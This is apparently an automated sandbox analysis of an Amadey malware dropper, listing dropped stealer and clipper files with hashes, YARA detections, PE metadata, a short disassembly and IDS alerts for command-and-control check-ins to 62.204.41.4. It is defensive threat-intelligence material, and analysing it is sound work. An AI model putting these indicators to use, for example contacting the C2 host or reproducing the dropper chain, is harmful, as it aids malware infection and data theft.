                                                                    SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                                    MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                                    SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                                    SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                                    SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                    Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):91136
                                                                    Entropy (8bit):6.3469756750979025
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                    MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                    SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                    SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                    SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll, Author: Joe Security
                                                                    Joe Sandbox View:
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):241664
                                                                    Entropy (8bit):6.368190069123744
                                                                    Encrypted:false
                                                                    SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                    MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                    SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                    SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):391168
                                                                    Entropy (8bit):7.696590302349953
                                                                    Encrypted:false
                                                                    SSDEEP:6144:Ksy+bnr+2p0yN90QELcyqDU1HID5nWBoxGGkH2OA+tBMIms+zrnZR6z8d6Q:AMrWy90ZmDU1oABZGkWORr/+5RV4Q
                                                                    MD5:03D901B08C7DE9A3C6323A8C6DF73569
                                                                    SHA1:509117A267058FDE7DDEBCC55C6029BF4DFED936
                                                                    SHA-256:78FFBAB40C309B39013483768AD835FFE1466341E7766419623E47121796F75A
                                                                    SHA-512:B3903E6BB9ADA0600BE11F16C1A7A1AF78EECE2122BEE99518D216A0DCDA902FBC1577BF792951B7646C1380813E8CED8924178D410B373D723D4683255371D5
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................P............@...... .......................................p...................@..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc............r...|..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):241664
                                                                    Entropy (8bit):6.368190069123744
                                                                    Encrypted:false
                                                                    SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                    MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                    SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                    SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):372736
                                                                    Entropy (8bit):6.535399889112572
                                                                    Encrypted:false
                                                                    SSDEEP:6144:XkBx5F9AZ8UYK7uj8YCe6SjiELiqc++vJ:XIZAZ88ij8YvDjiYunJ
                                                                    MD5:AD3805672C5FE617D88DCE7E50E56B9F
                                                                    SHA1:B2DA5262E12A8AA60FB08406520D81F4B05695E8
                                                                    SHA-256:731CCE27B96AD4396F53F718EBE59A9F1096D4EB7DA50753B83F04503CE63B6D
                                                                    SHA-512:4B56CFE1452BEEF687706F801D1E0EFDBC84487B3587AD545DA2D2A39862F07F5C6B4F62F527F9B6C9961A32C7A223162DA1425DE6F02919ACE2868C770BEAFB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........H...H...H...V.R.\...V.D.(...V.C.o...o...A...H..."...V.M.I...V.S.I...V.V.I...RichH...........................PE..L...o..b.....................z.......R............@..................................t..........................................d........]...................p..T....................................-..@...............X............................text............................... ..`.data...............................@....gus....F...........................@..@.dux.................&..............@..@.rsrc....].......^...*..............@..@.reloc..*&...p...(..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11264
                                                                    Entropy (8bit):4.97029807367379
                                                                    Encrypted:false
                                                                    SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                    MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                    SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                    SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                    SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                    Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):91136
                                                                    Entropy (8bit):6.3469756750979025
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                    MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                    SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                    SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                    SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):4.621829903792328
                                                                    Encrypted:false
                                                                    SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                                    MD5:1B7C22A214949975556626D7217E9A39
                                                                    SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                                    SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                                    SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                                    Malicious:false
                                                                    Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                                    Process:C:\Windows\SysWOW64\cacls.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15
                                                                    Entropy (8bit):3.240223928941852
                                                                    Encrypted:false
                                                                    SSDEEP:3:o3F:o1
                                                                    MD5:509B054634B6DE74F111C3E646BC80FD
                                                                    SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                    SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                    SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                    Malicious:false
                                                                    Preview:processed dir:
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.83021524008986
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:file.exe
                                                                    File size:582144
                                                                    MD5:392470d5b5723c386b943751c15721a6
                                                                    SHA1:83491316d575cc2a867224532fe25e016d8c3f43
                                                                    SHA256:fd0d72d174c13185267e7e38ac8faf1e5b646e5852645e83dcc12a028214a707
                                                                    SHA512:ea71470597d021a0f0cf727ff5c3d3798ddb58d91ee279e62740482452acd790998716cb3a230ee9aef5d1e9a8d5e5027921ac9dab7740a2fcc16c53ca06d299
                                                                    SSDEEP:12288:eMroy908TE1aEzFLw/64P8A3MykWO2r/+hdd4u1QxgKj:Gy9I7FL7aRvLpr/EUGQ1j
                                                                    TLSH:D0C40217A7ED5022E4B967B018F703C70B37BEA11B35C657278F695A1C732A4A23532B
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                    Icon Hash:f8e0e4e8ecccc870
                                                                    Entrypoint:0x406a60
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:10
                                                                    OS Version Minor:0
                                                                    File Version Major:10
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:10
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                    Instruction
                                                                    call 00007F74C4AD43D5h
                                                                    jmp 00007F74C4AD3CE5h
                                                                    push 00000058h
                                                                    push 004072B8h
                                                                    call 00007F74C4AD4477h
                                                                    xor ebx, ebx
                                                                    mov dword ptr [ebp-20h], ebx
                                                                    lea eax, dword ptr [ebp-68h]
                                                                    push eax
                                                                    call dword ptr [0040A184h]
                                                                    mov dword ptr [ebp-04h], ebx
                                                                    mov eax, dword ptr fs:[00000018h]
                                                                    mov esi, dword ptr [eax+04h]
                                                                    mov edi, ebx
                                                                    mov edx, 004088ACh
                                                                    mov ecx, esi
                                                                    xor eax, eax
                                                                    lock cmpxchg dword ptr [edx], ecx
                                                                    test eax, eax
                                                                    je 00007F74C4AD3CFAh
                                                                    cmp eax, esi
                                                                    jne 00007F74C4AD3CE9h
                                                                    xor esi, esi
                                                                    inc esi
                                                                    mov edi, esi
                                                                    jmp 00007F74C4AD3CF2h
                                                                    push 000003E8h
                                                                    call dword ptr [0040A188h]
                                                                    jmp 00007F74C4AD3CB9h
                                                                    xor esi, esi
                                                                    inc esi
                                                                    cmp dword ptr [004088B0h], esi
                                                                    jne 00007F74C4AD3CECh
                                                                    push 0000001Fh
                                                                    call 00007F74C4AD420Bh
                                                                    pop ecx
                                                                    jmp 00007F74C4AD3D1Ch
                                                                    cmp dword ptr [004088B0h], ebx
                                                                    jne 00007F74C4AD3D0Eh
                                                                    mov dword ptr [004088B0h], esi
                                                                    push 004010C4h
                                                                    push 004010B8h
                                                                    call 00007F74C4AD3E36h
                                                                    pop ecx
                                                                    pop ecx
                                                                    test eax, eax
                                                                    je 00007F74C4AD3CF9h
                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                    mov eax, 000000FFh
                                                                    jmp 00007F74C4AD3E19h
                                                                    mov dword ptr [004081E4h], esi
                                                                    cmp dword ptr [004088B0h], esi
                                                                    jne 00007F74C4AD3CFDh
                                                                    push 004010B4h
                                                                    push 004010ACh
                                                                    call 00007F74C4AD43C5h
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov dword ptr [000088B0h], 00000000h
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x85ba8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000x888.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xc0000x860000x85c00False0.9308100905373832data7.871206042948107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x920000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountry
                                                                    AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                    RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                    RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                    RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                    RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                    RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                    RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                    RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                    RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                    RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                    RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                    RT_DIALOG0x24a340x35cdataRussianRussia
                                                                    RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                    RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                    RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                    RT_DIALOG0x2525c0x168dataRussianRussia
                                                                    RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                    RT_DIALOG0x255840x1e0dataRussianRussia
                                                                    RT_DIALOG0x257640x130dataEnglishUnited States
                                                                    RT_DIALOG0x258940x150dataRussianRussia
                                                                    RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                    RT_DIALOG0x25b040x122dataRussianRussia
                                                                    RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                    RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                    RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                    RT_STRING0x2625c0x52edataRussianRussia
                                                                    RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                    RT_STRING0x26d580x592dataRussianRussia
                                                                    RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                    RT_STRING0x2779c0x4b2dataRussianRussia
                                                                    RT_STRING0x27c500x44adataEnglishUnited States
                                                                    RT_STRING0x2809c0x43edataRussianRussia
                                                                    RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                    RT_STRING0x288ac0x2fcdataRussianRussia
                                                                    RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                    RT_RCDATA0x28bb00x67eccMicrosoft Cabinet archive data, many, 425676 bytes, 2 files, at 0x2c +A "bmMg.exe" +A "xriv.exe", ID 1580, number 1, 20 datablocks, 0x1503 compressionEnglishUnited States
                                                                    RT_RCDATA0x90a7c0x4dataEnglishUnited States
                                                                    RT_RCDATA0x90a800x24dataEnglishUnited States
                                                                    RT_RCDATA0x90aa40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                    RT_RCDATA0x90aac0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                    RT_RCDATA0x90ab40x4dataEnglishUnited States
                                                                    RT_RCDATA0x90ab80x9ASCII text, with no line terminatorsEnglishUnited States
                                                                    RT_RCDATA0x90ac40x4dataEnglishUnited States
                                                                    RT_RCDATA0x90ac80x9ASCII text, with no line terminatorsEnglishUnited States
                                                                    RT_RCDATA0x90ad40x4dataEnglishUnited States
                                                                    RT_RCDATA0x90ad80x6dataEnglishUnited States
                                                                    RT_RCDATA0x90ae00x7ASCII text, with no line terminatorsEnglishUnited States
                                                                    RT_RCDATA0x90ae80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                    RT_GROUP_ICON0x90af00xbcdataEnglishUnited States
                                                                    RT_VERSION0x90bac0x408dataEnglishUnited States
                                                                    RT_VERSION0x90fb40x410dataRussianRussia
                                                                    RT_MANIFEST0x913c40x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                    DLLImport
                                                                    ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                    KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                    GDI32.dllGetDeviceCaps
                                                                    USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                    msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                    COMCTL32.dll
                                                                    Cabinet.dll
                                                                    VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    RussianRussia
                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    192.168.2.362.204.41.449933802027700 02/08/23-21:32:21.545353TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449740802027700 02/08/23-21:31:26.105437TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.362.204.41.4
